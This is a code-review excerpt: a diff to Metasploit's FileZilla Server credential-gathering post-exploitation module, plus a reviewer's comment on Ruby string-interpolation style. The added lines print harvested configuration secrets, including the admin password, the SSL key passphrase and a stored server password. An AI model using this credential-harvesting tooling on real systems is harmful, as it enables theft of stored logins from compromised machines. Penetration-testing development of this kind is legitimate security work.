modules/post/windows/gather/credentials/filezilla_server.rb

```diff
@@ -224,70 +225,89 @@ def get_filezilla_creds(paths)
 
       # Assemble the options hash for creating the Metasploit::Credential::Login object
       login_data ={
-          core: credential_core,
-          status: Metasploit::Model::Login::Status::UNTRIED
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED
       }
 
       # Merge in the service data and create our Login
       login_data.merge!(service_data)
       login = create_credential_login(login_data)
-
     end
 
+    vprint_status("       FTP Port: %s" % config['ftp_port'])
+    vprint_status("    FTP Bind IP: %s" % config['ftp_bindip'])
+    vprint_status("            SSL: %s" % config['ssl'])
+    vprint_status("     Admin Port: %s" % config['admin_port'])
+    vprint_status("  Admin Bind IP: %s" % config['admin_bindip'])
+    vprint_status("     Admin Pass: %s" % config['admin_pass'])
+    vprint_line("")
+
+    configuration << [config['ftp_port'], config['ftp_bindip'], config['admin_port'], config['admin_bindip'], config['admin_pass'],
+      config['ssl'], config['ssl_certfile'], config['ssl_keypass']]
+
+
+    lastser = parse_interface(fsi_xml)
+    lastserver << [lastser['ip'], lastser['port'], lastser['password']]
+
+    vprint_status("Last Server Information:")
+    vprint_status("         IP: %s" % lastser['ip'])
+    vprint_status("       Port: %s" % lastser['port'])
+    vprint_status("   Password: %s" % lastser['password'])
+    vprint_line("")
```

Comment:
Ruby convention for string interpolation should be used. Also no need for vprint_line(""). Just vprint_line is sufficient.